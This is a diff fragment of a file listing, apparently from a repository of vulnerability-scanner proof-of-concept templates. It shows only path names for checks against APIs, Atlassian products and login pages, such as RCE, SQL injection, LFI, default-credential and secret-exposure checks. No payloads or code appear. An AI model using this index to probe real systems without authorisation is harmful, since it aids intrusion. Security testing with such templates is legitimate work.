-./poc/api/api-square-496.yaml -./poc/api/api-sslmate-497.yaml +./poc/api/api-spotify.yaml +./poc/api/api-square.yaml +./poc/api/api-sslmate.yaml ./poc/api/api-strava-498.yaml -./poc/api/api-stripe-499.yaml ./poc/api/api-stripe.yaml ./poc/api/api-stytch.yaml -./poc/api/api-taiga-501.yaml -./poc/api/api-thecatapi-502.yaml +./poc/api/api-taiga.yaml ./poc/api/api-thecatapi-503.yaml -./poc/api/api-tink-504.yaml +./poc/api/api-tink.yaml ./poc/api/api-tinypng-505.yaml ./poc/api/api-travisci-506.yaml -./poc/api/api-travisci.yaml ./poc/api/api-twitter.yaml ./poc/api/api-urlscan-508.yaml ./poc/api/api-users-exposed.yaml ./poc/api/api-vercel.yaml ./poc/api/api-virustotal-511.yaml ./poc/api/api-virustotal-512.yaml -./poc/api/api-visualstudio-513.yaml +./poc/api/api-visualstudio.yaml ./poc/api/api-wakatime-514.yaml +./poc/api/api-wakatime.yaml ./poc/api/api-weatherstack.yaml ./poc/api/api-webex-515.yaml -./poc/api/api-weglot-516.yaml ./poc/api/api-weglot.yaml -./poc/api/api-wordcloud-517.yaml ./poc/api/api-wordcloud-518.yaml -./poc/api/api-youtube-519.yaml +./poc/api/api-youtube.yaml ./poc/api/api-zenserp.yaml ./poc/api/api-zipcodebase.yaml ./poc/api/api2cart-bridge-connector-7f28d21ce1d1423f08ff3303e97fdcda.yaml @@ -633,7 +617,6 @@ ./poc/api/apilayer-caddy.yaml ./poc/api/apiman-panel-460.yaml ./poc/api/apiman-panel-461.yaml -./poc/api/apiman-panel-462.yaml ./poc/api/apiman-panel-463.yaml ./poc/api/apisix-default-login-491.yaml ./poc/api/apisix-default-login-492.yaml @@ -649,12 +632,10 @@ ./poc/api/beamer-api-token.yaml ./poc/api/bems-api-lfi-707.yaml ./poc/api/bems-api-lfi-708.yaml -./poc/api/bems-api-lfi-709.yaml ./poc/api/bems-api-lfi-710.yaml ./poc/api/bems-api-lfi-711.yaml -./poc/api/bems-api-lfi-712.yaml ./poc/api/burp-api-detect-809.yaml -./poc/api/burp-api-detect-812.yaml +./poc/api/burp-api-detect-810.yaml ./poc/api/burp-api-detect-813.yaml ./poc/api/burp-api-detect.yaml ./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml 
@@ -731,6 +712,7 @@ ./poc/api/fastapi-3.yaml ./poc/api/fastapi-4.yaml ./poc/api/fastapi-5.yaml +./poc/api/fastapi-docs-7398.yaml ./poc/api/fastapi-docs-7399.yaml ./poc/api/fastapi-docs.yaml ./poc/api/fastly-api-token.yaml @@ -752,7 +734,6 @@ ./poc/api/gitlab-user-open-api-7703.yaml ./poc/api/gitlab-user-open-api.yaml ./poc/api/gmail-api-client-secrets-7740.yaml -./poc/api/gmail-api-client-secrets-7741.yaml ./poc/api/gmail-api-client-secrets.yaml ./poc/api/goSwaggerAPI.yaml ./poc/api/google-api(1).yaml @@ -768,13 +749,13 @@ ./poc/api/grafana-api-key-exposure.yaml ./poc/api/grafana_with_prometheus_api_proxy.yaml ./poc/api/graphql-apiforwp-detect.yaml +./poc/api/graylog-api-browser-7846.yaml ./poc/api/graylog-api-browser-7847.yaml ./poc/api/graylog-api-browser-7848.yaml -./poc/api/graylog-api-browser.yaml ./poc/api/hidden-api-endpoint-discovery.yaml ./poc/api/hidden-api-key-exposure.yaml -./poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/api/http-etcd-unauthenticated-api-data-leak-8057.yaml +./poc/api/http-etcd-unauthenticated-api-data-leak.yaml ./poc/api/iis-enum-httpapi.yaml ./poc/api/jenkins-api-panel-8261.yaml ./poc/api/jenkins-api-panel-8262.yaml @@ -796,12 +777,12 @@ ./poc/api/k8s-apiserver-unauthorized.yaml ./poc/api/kube-api-deployments-8503.yaml ./poc/api/kube-api-deployments-8504.yaml +./poc/api/kube-api-namespaces-8505.yaml ./poc/api/kube-api-namespaces-8506.yaml ./poc/api/kube-api-nodes-8507.yaml -./poc/api/kube-api-nodes-8508.yaml -./poc/api/kube-api-nodes.yaml ./poc/api/kube-api-pods-8509.yaml ./poc/api/kube-api-pods-8510.yaml +./poc/api/kube-api-pods.yaml ./poc/api/kube-api-roles.yaml ./poc/api/kube-api-scan.yaml ./poc/api/kube-api-secrets-8511.yaml 
@@ -815,15 +796,15 @@ ./poc/api/magento-2-exposed-api-2.yaml ./poc/api/magento-2-exposed-api-3.yaml ./poc/api/magento-2-exposed-api-8687.yaml +./poc/api/magento-2-exposed-api-8688.yaml ./poc/api/magento-2-exposed-api-8689.yaml ./poc/api/mailchimp-api-11854.yaml ./poc/api/mailchimp-api-key-8722.yaml ./poc/api/mailchimp-api-key-8723.yaml ./poc/api/mailchimp-api-key-8724.yaml -./poc/api/mailchimp-api-key-8726.yaml ./poc/api/mailchimp-api-key.yaml ./poc/api/mailchimp-api.yaml -./poc/api/mailgun-api-11855.yaml +./poc/api/mailgun-api(1).yaml ./poc/api/mailgun-api.yaml ./poc/api/mapifylite-0f50434af4d25993907702f024089573.yaml ./poc/api/mapifylite-5337e2d76eda361e94ff056a55642367.yaml @@ -919,17 +900,17 @@ ./poc/api/strapi-cms-detect-10539.yaml ./poc/api/strapi-cms-detect-10540.yaml ./poc/api/strapi-cms-detect-10541.yaml -./poc/api/strapi-documentation-10543.yaml +./poc/api/strapi-documentation-10542.yaml ./poc/api/strapi-documentation.yaml ./poc/api/strapi-page-1.yaml ./poc/api/strapi-page-10544.yaml +./poc/api/strapi-page-10545.yaml ./poc/api/strapi-page-10546.yaml ./poc/api/strapi-page-10547.yaml ./poc/api/strapi-page-2.yaml -./poc/api/strapi-page.yaml ./poc/api/strapi-panel-10548.yaml ./poc/api/strapi-panel.yaml -./poc/api/stripe-api-key-11869.yaml +./poc/api/stripe-api-key(1).yaml ./poc/api/stripe-api-key.yaml ./poc/api/swagger-api-1.yaml ./poc/api/swagger-api-10.yaml 
@@ -1012,14 +993,13 @@ ./poc/api/swagger-api.yaml ./poc/api/tongda-api-ali-fileupload.yaml ./poc/api/tongda-oa-api-ali-upload.yaml -./poc/api/twilio-api-10861.yaml +./poc/api/twilio-api-10860.yaml ./poc/api/twilio-api.yaml ./poc/api/unauth-spark-api-10961.yaml ./poc/api/unauth-spark-api-10962.yaml ./poc/api/unauth-spark-api-10963.yaml ./poc/api/unauth-spark-api-10964.yaml ./poc/api/unauth-spark-api-10965.yaml -./poc/api/unauth-spark-api.yaml ./poc/api/versa-director-api-detect.yaml ./poc/api/video-conferencing-with-zoom-api-075bf74052a0ad5436e52ba850a78457.yaml ./poc/api/video-conferencing-with-zoom-api-123050da768f674023e8ffc84b941d85.yaml @@ -1038,7 +1018,6 @@ ./poc/api/video-conferencing-with-zoom-api-plugin.yaml ./poc/api/video-conferencing-with-zoom-api.yaml ./poc/api/wadl-api-1.yaml -./poc/api/wadl-api-11082.yaml ./poc/api/wadl-api-11083.yaml ./poc/api/wadl-api-11084.yaml ./poc/api/wadl-api-11085.yaml @@ -1065,14 +1044,15 @@ ./poc/api/wpgetapi.yaml ./poc/api/wsdl-api-11632.yaml ./poc/api/wsdl-api-11633.yaml +./poc/api/wsdl-api-11634.yaml ./poc/api/wso2-apimanager-detect-11637.yaml -./poc/api/wso2-apimanager-detect-11638.yaml ./poc/api/wso2-apimanager-detect-11639.yaml ./poc/api/wso2-apimanager-detect.yaml ./poc/api/yapi-detect-11719.yaml ./poc/api/yapi-detect-11720.yaml ./poc/api/yapi-detect-11722.yaml ./poc/api/yapi-rce-11724.yaml +./poc/api/yapi-rce-11725.yaml ./poc/api/yapi-rce-11726.yaml ./poc/api/yapi-rce.yml ./poc/api/yapi-sql-inject.yaml 
@@ -1083,12 +1063,12 @@ ./poc/api/zentao-api-getModel-api-getMethod-filePath-Anyfileread.yaml ./poc/atlassian/Confluence-SSRF.yaml ./poc/atlassian/Confluence_CVE-2022-26134.yaml +./poc/atlassian/atlassian-bamboo-panel.yaml ./poc/atlassian/atlassian-bamboo-setup-wizard.yaml ./poc/atlassian/atlassian-bamboo-version-detect.yaml ./poc/atlassian/atlassian-bitbucket-loginbypass.yaml ./poc/atlassian/atlassian-crowd-panel-580.yaml ./poc/atlassian/atlassian-crowd-panel-582.yaml -./poc/atlassian/atlassian-crowd-panel-583.yaml ./poc/atlassian/atlassian-crowd-panel-584.yaml ./poc/atlassian/atlassian-crowd-panel-585.yaml ./poc/atlassian/atlassian-crowd-panel.yaml @@ -1102,8 +1082,8 @@ ./poc/atlassian/bitbucket-client-id.yaml ./poc/atlassian/bitbucket-client-secret.yaml ./poc/atlassian/bitbucket-public-repository.yaml +./poc/atlassian/bitbucket-takeover-738.yaml ./poc/atlassian/bitbucket-takeover-739.yaml -./poc/atlassian/bitbucket-takeover-740.yaml ./poc/atlassian/bitbucket-takeover-741.yaml ./poc/atlassian/bitbucket-takeover.yaml ./poc/atlassian/confluence-cve-2015-8399.yml @@ -1114,15 +1094,15 @@ ./poc/atlassian/confluence-dashboard.yaml ./poc/atlassian/confluence-detect-1.yaml ./poc/atlassian/confluence-detect-1186.yaml -./poc/atlassian/confluence-detect-1187.yaml ./poc/atlassian/confluence-detect-1188.yaml +./poc/atlassian/confluence-detect-1189.yaml ./poc/atlassian/confluence-detect-2.yaml ./poc/atlassian/confluence-detect-3.yaml ./poc/atlassian/confluence-detect-4.yaml ./poc/atlassian/confluence-detect.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1190.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1191.yaml -./poc/atlassian/confluence-ssrf-sharelinks-1193.yaml +./poc/atlassian/confluence-ssrf-sharelinks-1192.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1194.yaml ./poc/atlassian/confluence-workflow-1195.yaml ./poc/atlassian/confluence-workflow.yaml 
@@ -1136,7 +1116,7 @@ ./poc/atlassian/jira-detect-1.yaml ./poc/atlassian/jira-detect-2.yaml ./poc/atlassian/jira-detect-3.yaml -./poc/atlassian/jira-detect-8314.yaml +./poc/atlassian/jira-detect-8313.yaml ./poc/atlassian/jira-detect-8315.yaml ./poc/atlassian/jira-detect-8316.yaml ./poc/atlassian/jira-detect.yaml @@ -1158,11 +1138,11 @@ ./poc/atlassian/jira-unauthenticated-dashboards-8327.yaml ./poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml ./poc/atlassian/jira-unauthenticated-installed-gadgets-8329.yaml -./poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml +./poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml ./poc/atlassian/jira-unauthenticated-popular-filters.yaml -./poc/atlassian/jira-unauthenticated-projectcategories-8332.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8333.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml +./poc/atlassian/jira-unauthenticated-projectcategories.yaml ./poc/atlassian/jira-unauthenticated-projects-8335.yaml ./poc/atlassian/jira-unauthenticated-projects-8336.yaml ./poc/atlassian/jira-unauthenticated-resolutions-8337.yaml @@ -1172,6 +1152,7 @@ ./poc/atlassian/jira-unauthenticated-user-picker-8341.yaml ./poc/atlassian/jira-unauthenticated.yaml ./poc/atlassian/jira-workflow.yaml +./poc/atlassian/jira_user_piker (copy 1).yaml ./poc/atlassian/jira_user_piker.yaml ./poc/atlassian/jirausername.yaml ./poc/atlassian/poc-yaml-Confluence-ognl-rce.yaml @@ -1197,7 +1178,6 @@ ./poc/auth/Discuz-unauthorized-tools.yaml ./poc/auth/DocCMS-keyword-SQL.yaml ./poc/auth/DocCMS-keyword-sqli.yaml -./poc/auth/Dynatrace-token (copy 1).yaml ./poc/auth/Dynatrace-token.yaml ./poc/auth/EOffice_UserSelect_unauth.yaml ./poc/auth/E_cology-sqli-login.yaml 
@@ -1240,6 +1220,7 @@ ./poc/auth/Mallbuilder-smarty_config_key-SQLi.yaml ./poc/auth/Mallbuilder-sub_site_key-SQLi.yaml ./poc/auth/Mallbuilder-wap_key-SQLi.yaml +./poc/auth/Mantis-Default_login.yaml ./poc/auth/Metinfo-V5_0_admin_memeber_getpassword-SQLi.yaml ./poc/auth/Metinfo-login_check-SQLi.yaml ./poc/auth/MinIO-default-login.yaml @@ -1257,7 +1238,6 @@ ./poc/auth/PRTGNetwork-DefaultLogin.yaml ./poc/auth/Paypal-braintree-token.yaml ./poc/auth/Pictatic-API-key.yaml -./poc/auth/Redmine-Default-Login.yaml ./poc/auth/SQL_injection-Authentification.yaml ./poc/auth/SSLSessionReq.yaml ./poc/auth/SSLv23SessionReq.yaml @@ -1306,13 +1286,13 @@ ./poc/auth/access-category-password.yaml ./poc/auth/accredible-certificates-19877bfd228a784355caff7bdef8ce37.yaml ./poc/auth/accredible-certificates.yaml -./poc/auth/acemanager-login-23.yaml +./poc/auth/acemanager-login-24.yaml ./poc/auth/acemanager-login-25.yaml ./poc/auth/acemanager-login.yaml -./poc/auth/activemq-default-login-44.yaml ./poc/auth/activemq-default-login-45.yaml ./poc/auth/activemq-default-login-46.yaml ./poc/auth/activemq-default-login-47.yaml +./poc/auth/activemq-default-login-48.yaml ./poc/auth/activemq-default-password.yaml ./poc/auth/activemq-default-password.yml ./poc/auth/acumbamail-signup-forms-800304421471470ce44a3c0fd0b43721.yaml 
@@ -1343,38 +1323,41 @@ ./poc/auth/adobe-aem-default-credentials-9.yaml ./poc/auth/adobe-component-login-1.yaml ./poc/auth/adobe-component-login-2.yaml -./poc/auth/adobe-component-login-90.yaml +./poc/auth/adobe-component-login-89.yaml +./poc/auth/adobe-component-login-91.yaml ./poc/auth/adobe-component-login-92.yaml ./poc/auth/adobe-component-login.yaml -./poc/auth/adobe-connect-central-login-93.yaml ./poc/auth/adobe-connect-central-login-94.yaml ./poc/auth/adobe-connect-central-login-95.yaml +./poc/auth/adobe-connect-central-login-96.yaml ./poc/auth/adobe-connect-central-login-97.yaml ./poc/auth/adobe-connect-central-login.yaml -./poc/auth/adobe-experience-manager-login-105.yaml +./poc/auth/adobe-experience-manager-login-106.yaml ./poc/auth/adobe-experience-manager-login-107.yaml ./poc/auth/adobe-experience-manager-login-108.yaml ./poc/auth/adobe-experience-manager-login-109.yaml ./poc/auth/adobe-experience-manager-login.yaml ./poc/auth/adobe-secret.yaml -./poc/auth/aem-default-login-140.yaml ./poc/auth/aem-default-login-141.yaml ./poc/auth/aem-default-login-142.yaml +./poc/auth/aem-login-status-167.yaml ./poc/auth/aem-login-status-168.yaml -./poc/auth/aem-login-status-169.yaml ./poc/auth/aem-login-status-170.yaml ./poc/auth/aem-login-status-171.yaml +./poc/auth/aem-secrets.yaml ./poc/auth/aem-sling-login.yaml ./poc/auth/afterlogic-webmail-login.yaml ./poc/auth/age-identity-secret-key.yaml ./poc/auth/age-recipient-public-key.yaml ./poc/auth/aic-intelligent-campus-system-password-leak.yaml ./poc/auth/aic-intelligent-password-leak.yaml -./poc/auth/aims-password-mgmt-client-218.yaml +./poc/auth/aims-password-mgmt-client-219.yaml ./poc/auth/aims-password-mgmt-client-220.yaml +./poc/auth/aims-password-mgmt-client-221.yaml ./poc/auth/aims-password-mgmt-client.yaml ./poc/auth/aims-password-portal-222.yaml ./poc/auth/aims-password-portal-223.yaml +./poc/auth/aims-password-portal-225.yaml ./poc/auth/aims-password-portal.yaml ./poc/auth/aircube-login.yaml 
./poc/auth/airflow-default-credentials.yaml @@ -1391,13 +1374,13 @@ ./poc/auth/alibaba-canal-default-password.yaml ./poc/auth/alibaba-canal-default-password.yml ./poc/auth/alibaba-key-id.yaml +./poc/auth/alibaba-mongoshake-unauth-268.yaml ./poc/auth/alibaba-mongoshake-unauth-269.yaml ./poc/auth/alibaba-mongoshake-unauth-270.yaml ./poc/auth/alibaba-nacos-v1-auth-bypass.yml ./poc/auth/alibaba-secret-id.yaml ./poc/auth/alphaweb-default-login-276.yaml ./poc/auth/alphaweb-default-login-277.yaml -./poc/auth/alphaweb-default-login.yaml ./poc/auth/amazon-accesskey-bypass.yaml ./poc/auth/amazon-mws-auth-token-11845.yaml ./poc/auth/amazon-mws-auth-token-281.yaml @@ -1409,8 +1392,8 @@ ./poc/auth/amazon-sns-token.yaml ./poc/auth/ambari-default-credentials-286.yaml ./poc/auth/ambari-default-credentials.yaml -./poc/auth/ambari-default-login-287.yaml ./poc/auth/ambari-default-login-288.yaml +./poc/auth/ambari-default-login-289.yaml ./poc/auth/ambari-default-login-290.yaml ./poc/auth/ambari-default-password.yaml ./poc/auth/amcrest-login-297.yaml @@ -1418,7 +1401,7 @@ ./poc/auth/amcrest-login-299.yaml ./poc/auth/amcrest-login.yaml ./poc/auth/ametys-admin-login-300.yaml -./poc/auth/ametys-admin-login-301.yaml +./poc/auth/ametys-admin-login-302.yaml ./poc/auth/ametys-admin-login.yaml ./poc/auth/ampjuke-default-login.yaml ./poc/auth/anaqua-login-panel.yaml @@ -1430,7 +1413,6 @@ ./poc/auth/apache-couchdb-unauth.yaml ./poc/auth/apache-druid-unauth.yaml ./poc/auth/apache-dubbo-unauth.yaml -./poc/auth/apache-flink-unauth-rce-355.yaml ./poc/auth/apache-flink-unauth-rce-356.yaml ./poc/auth/apache-flink-unauth-rce-357.yaml ./poc/auth/apache-flink-unauth-rce-358.yaml 
@@ -1445,28 +1427,25 @@ ./poc/auth/apache-tomcat-snoop-cookie-handling.yaml ./poc/auth/apc-login.yaml ./poc/auth/apc-ups-login-382.yaml -./poc/auth/apc-ups-login.yaml ./poc/auth/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml ./poc/auth/api-bearer-auth.yaml ./poc/auth/api-fortitoken-cloud.yaml ./poc/auth/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/auth/api-key-for-google-maps.yaml ./poc/auth/api-keys.yaml -./poc/auth/api-mojoauth-466.yaml +./poc/auth/api-mojoauth.yaml ./poc/auth/api-onelogin.yaml ./poc/auth/apisix-default-login-491.yaml ./poc/auth/apisix-default-login-492.yaml ./poc/auth/apollo-default-login-520.yaml -./poc/auth/apollo-default-login-521.yaml +./poc/auth/apollo-default-login.yaml ./poc/auth/apple-app-site-association-524.yaml ./poc/auth/apple-app-site-association-526.yaml ./poc/auth/apple-app-site-association.yaml ./poc/auth/appsmith-web-login.yaml ./poc/auth/arcgis-tokens.yaml -./poc/auth/argocd-login-534.yaml ./poc/auth/argocd-login-535.yaml -./poc/auth/argocd-login.yaml -./poc/auth/arl-default-login-537.yaml +./poc/auth/argocd-login-536.yaml ./poc/auth/arl-default-login-538.yaml ./poc/auth/arl-default-login-539.yaml ./poc/auth/arl-default-login-540.yaml @@ -1486,7 +1465,6 @@ ./poc/auth/atlassian-login-default.yaml ./poc/auth/atvise-login-589.yaml ./poc/auth/atvise-login-590.yaml -./poc/auth/atvise-login.yaml ./poc/auth/auth token leake.yaml ./poc/auth/auth-header-manipulation.yaml ./poc/auth/auth-js.yaml @@ -1500,6 +1478,7 @@ ./poc/auth/auth0-e0dcfb20615268d5a66a83645978bad5.yaml ./poc/auth/auth0.yaml ./poc/auth/auth_header.yaml +./poc/auth/authelia-panel.yaml ./poc/auth/authentic-8c2802cf9a9b808fbe84a5b3c21b5317.yaml ./poc/auth/authentic-b81cdffef50a03e77072606b54d17c70.yaml ./poc/auth/authentic-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -1538,22 +1517,22 @@ ./poc/auth/auto-login-when-resister-2f930912217edb47a1b0335c7c11b347.yaml ./poc/auth/auto-login-when-resister.yaml ./poc/auth/avatier-password-management-604.yaml -./poc/auth/avatier-password-management-605.yaml -./poc/auth/avatier-password-management.yaml +./poc/auth/avatier_password_management.yaml ./poc/auth/avigilon-login.yaml ./poc/auth/avtech-password-disclosure.yaml ./poc/auth/aws-access-key-value-622.yaml ./poc/auth/aws-access-key-value-623.yaml +./poc/auth/aws-access-key-value-624.yaml ./poc/auth/aws-access-key-value-625.yaml ./poc/auth/aws-access-key-value.yaml ./poc/auth/aws-access-key.yaml -./poc/auth/aws-opensearch-login-650.yaml +./poc/auth/aws-opensearch-login-649.yaml ./poc/auth/aws-opensearch-login.yaml ./poc/auth/aws-secrets.yaml ./poc/auth/axiom-digitalocean-key-exposure-665.yaml ./poc/auth/axiom-digitalocean-key-exposure-666.yaml -./poc/auth/axiom-digitalocean-key-exposure-667.yaml ./poc/auth/axiom-digitalocean-key-exposure-668.yaml +./poc/auth/axiom-digitalocean-key-exposure.yaml ./poc/auth/axis2-default-login-1.yaml ./poc/auth/axis2-default-login-2.yaml ./poc/auth/axis2-default-login.yaml @@ -1565,9 +1544,9 @@ ./poc/auth/axublog-v1-cookiebypass.yaml ./poc/auth/azkaban-default-login-671.yaml ./poc/auth/azkaban-default-login-672.yaml -./poc/auth/azkaban-default-login-673.yaml ./poc/auth/azkaban-default-login-674.yaml ./poc/auth/azkaban-default-login-675.yaml +./poc/auth/azkaban-default-login.yaml ./poc/auth/azkaban-default-password.yaml ./poc/auth/azkaban-web-client-default-creds.yaml ./poc/auth/azure-apim-secret-key-disclosure.yaml 
@@ -1575,14 +1554,15 @@ ./poc/auth/bang-resto-weak-password.yaml ./poc/auth/bangyong-pm2-global_userlogin-sqli-rce.yaml ./poc/auth/basic-auth-detect.yaml -./poc/auth/basic-auth-detection-687.yaml ./poc/auth/basic-auth-detection-688.yaml +./poc/auth/basic-auth-detection-689.yaml ./poc/auth/basic-auth-detection-691.yaml ./poc/auth/basic-auth-detection.yaml ./poc/auth/baw-login-logout-menu-321724627690a73c1b0fd584b423f0df.yaml ./poc/auth/baw-login-logout-menu.yaml ./poc/auth/bazarr-login-700.yaml ./poc/auth/bazarr-login-701.yaml +./poc/auth/bazarr-login-702.yaml ./poc/auth/bazarr-login.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-0c04f03046971ace3308f75f8502712f.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-4cedc7b2a0c00a81096cf3fcc283b780.yaml @@ -1609,8 +1589,8 @@ ./poc/auth/beyondtrust-login-server-718.yaml ./poc/auth/beyondtrust-login-server.yaml ./poc/auth/bigant-login-panel.yaml +./poc/auth/bigbluebutton-login-724.yaml ./poc/auth/bigbluebutton-login-725.yaml -./poc/auth/bigbluebutton-login-726.yaml ./poc/auth/bigbluebutton-login.yaml ./poc/auth/bigfix-login.yaml ./poc/auth/biometric-login-for-woocommerce-56a06f7ec0c2351c343ea2384b7dbd44.yaml @@ -1637,9 +1617,9 @@ ./poc/auth/blossom-spa.yaml ./poc/auth/blossomthemes-email-newsletter-7dc6edac570bf028c64b4de6d220672b.yaml ./poc/auth/blossomthemes-email-newsletter.yaml -./poc/auth/blue-iris-login-751.yaml ./poc/auth/blue-iris-login-752.yaml ./poc/auth/blue-iris-login-753.yaml +./poc/auth/blue-iris-login-754.yaml ./poc/auth/blue-iris-login.yaml ./poc/auth/bluet-keywords-tooltip-generator-71ffb92be6862dd3422bd8a61ad3a3ae.yaml ./poc/auth/bluet-keywords-tooltip-generator-9f8dfb534ce422b5a9c6344470f1b6e5.yaml 
@@ -1649,11 +1629,10 @@ ./poc/auth/bomgar-login-panel.yaml ./poc/auth/braintree-access-token-772.yaml ./poc/auth/braintree-access-token-773.yaml -./poc/auth/braintree-access-token.yaml ./poc/auth/branch-key-774.yaml ./poc/auth/branch-key.yaml ./poc/auth/brother-unauthorized-access-791.yaml -./poc/auth/brother-unauthorized-access-792.yaml +./poc/auth/brother-unauthorized-access-793.yaml ./poc/auth/brother-unauthorized-access.yaml ./poc/auth/brute-force-login-protection-20bc35cc9dd5149e33075d4261e715a7.yaml ./poc/auth/brute-force-login-protection.yaml @@ -1668,9 +1647,9 @@ ./poc/auth/camunda-login-panel-1.yaml ./poc/auth/camunda-login-panel-2.yaml ./poc/auth/camunda-login-panel.yaml +./poc/auth/canal-default-login-846.yaml ./poc/auth/canal-default-login-847.yaml ./poc/auth/canal-default-login-848.yaml -./poc/auth/canal-default-login-849.yaml ./poc/auth/canal-default-login.yaml ./poc/auth/captcha-code-authentication-198c2fa27cc518c127d49255679341f9.yaml ./poc/auth/captcha-code-authentication-c7faba710d318637d4639fc04a02d42a.yaml @@ -1715,7 +1694,6 @@ ./poc/auth/check-register_argc_argv.yaml ./poc/auth/checkmk-login.yaml ./poc/auth/chefio-login-check.yaml -./poc/auth/chinaunicom-default-login-906.yaml ./poc/auth/chinaunicom-default-login-907.yaml ./poc/auth/chinaunicom-default-login-908.yaml ./poc/auth/chinaunicom-default-login-909.yaml 
@@ -1725,16 +1703,16 @@ ./poc/auth/chinaunicom-modem-default-password.yml ./poc/auth/ciphertrust-default-password-vulnerability.yaml ./poc/auth/circarlife-default-login.yaml -./poc/auth/cisco-finesse-login-938.yaml ./poc/auth/cisco-finesse-login-939.yaml +./poc/auth/cisco-finesse-login-940.yaml ./poc/auth/cisco-finesse-login.yaml ./poc/auth/cisco-integrated-login-941.yaml ./poc/auth/cisco-integrated-login-942.yaml ./poc/auth/cisco-integrated-login.yaml +./poc/auth/cisco-systems-login-973.yaml ./poc/auth/cisco-systems-login-974.yaml -./poc/auth/cisco-systems-login-975.yaml ./poc/auth/cisco-systems-login.yaml -./poc/auth/cisco-ucs-kvm-login-980.yaml +./poc/auth/cisco-ucs-kvm-login-979.yaml ./poc/auth/cisco-ucs-kvm-login.yaml ./poc/auth/cisco-vmanage-login.yaml ./poc/auth/citrix-cve-2020-8193-unauthorized.yml @@ -1757,7 +1735,7 @@ ./poc/auth/clickhouse-api-unauth.yaml ./poc/auth/clickhouse-db-unauth.yaml ./poc/auth/clickhouse-server-Unauthorized-Sql.yaml -./poc/auth/clickhouse-unauth-1003.yaml +./poc/auth/clickhouse-unauth-1002.yaml ./poc/auth/clickhouse-unauth-1004.yaml ./poc/auth/clickhouse-unauth-api.yaml ./poc/auth/clickhouse-unauth.yaml @@ -1781,15 +1759,13 @@ ./poc/auth/co-authors-plus-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/co-authors-plus-plugin.yaml ./poc/auth/co-authors-plus.yaml -./poc/auth/cobbler-default-login-1119.yaml +./poc/auth/cobbler-default-login-1118.yaml ./poc/auth/cobbler-default-login-1120.yaml ./poc/auth/cobbler-default-login-1121.yaml -./poc/auth/cobbler-default-login.yaml ./poc/auth/code-climate-token.yaml ./poc/auth/code-server-login.yaml ./poc/auth/codecov-access-token.yaml ./poc/auth/codepen-login-check.yaml -./poc/auth/codian-mcu-login-1139.yaml ./poc/auth/codian-mcu-login-1140.yaml ./poc/auth/coinbase-access-token.yaml ./poc/auth/coldfusion-administrator-login-1144.yaml 
@@ -1802,6 +1778,7 @@ ./poc/auth/commax-biometric-auth-bypass-1157.yaml ./poc/auth/commax-credentials-disclosure-1158.yaml ./poc/auth/commax-credentials-disclosure-1159.yaml +./poc/auth/commax-credentials-disclosure-1160.yaml ./poc/auth/composer-auth-json.yaml ./poc/auth/comtrend-password-exposure-1166.yaml ./poc/auth/comtrend-password-exposure-1167.yaml @@ -1880,12 +1857,13 @@ ./poc/auth/credential-exposure-file.yaml ./poc/auth/credential-exposure.yaml ./poc/auth/credentials (copy 1).yaml -./poc/auth/credentials-1258.yaml +./poc/auth/credentials-1257.yaml ./poc/auth/credentials-1259.yaml ./poc/auth/credentials-disclosure-1252.yaml ./poc/auth/credentials-disclosure-1253.yaml ./poc/auth/credentials-disclosure-1254.yaml ./poc/auth/credentials-disclosure-1255.yaml +./poc/auth/credentials-disclosure-1256.yaml ./poc/auth/credentials-disclosure-all.yaml ./poc/auth/credentials-json.yaml ./poc/auth/credentials.yaml @@ -1895,12 +1873,15 @@ ./poc/auth/credova-financial.yaml ./poc/auth/crush-ftp-login-1273.yaml ./poc/auth/crush-ftp-login-1274.yaml +./poc/auth/crush-ftp-login-1275.yaml ./poc/auth/crush-ftp-login.yaml ./poc/auth/crushftp-anonymous-login.yaml +./poc/auth/crushftp-default-login.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1281.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1282.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1283.yaml -./poc/auth/cs-cart-unauthenticated-lfi-1285.yaml +./poc/auth/cs-cart-unauthenticated-lfi-1284.yaml +./poc/auth/cs-cart-unauthenticated-lfi.yaml ./poc/auth/cs141-default-login-1.yaml ./poc/auth/cs141-default-login-1277.yaml ./poc/auth/cs141-default-login-1279.yaml 
@@ -1974,16 +1955,15 @@ ./poc/auth/dbeaver-credentials-6777.yaml ./poc/auth/dbeaver-credentials-6778.yaml ./poc/auth/dbeaver-credentials-6779.yaml -./poc/auth/dbeaver-credentials-6780.yaml ./poc/auth/dbeaver-credentials-6781.yaml ./poc/auth/dbeaver-credentials-6782.yaml ./poc/auth/dell-emc-ecom-default-credentials-6917.yaml ./poc/auth/dell-emc-ecom-default-credentials.yaml ./poc/auth/dell-idrac-default-login-6942.yaml -./poc/auth/dell-idrac-default-login-6943.yaml ./poc/auth/dell-idrac-default-login-6944.yaml ./poc/auth/dell-idrac-default-login-6945.yaml ./poc/auth/dell-idrac-default-login-6946.yaml +./poc/auth/dell-idrac-default-login.yaml ./poc/auth/dell-idrac9-default-login-6930.yaml ./poc/auth/dell-idrac9-default-login-6931.yaml ./poc/auth/dell-idrac9-default-login-6932.yaml @@ -1994,9 +1974,7 @@ ./poc/auth/dell-openmanager-login-1.yaml ./poc/auth/dell-openmanager-login-2.yaml ./poc/auth/dell-openmanager-login-6948.yaml -./poc/auth/dell-openmanager-login-6949.yaml ./poc/auth/dell-openmanager-login-6950.yaml -./poc/auth/dell-openmanager-login-6951.yaml ./poc/auth/dell-openmanager-login.yaml ./poc/auth/dell-remote-power-management-default-login.yaml ./poc/auth/dell-wyse-login-6952.yaml @@ -2019,6 +1997,7 @@ 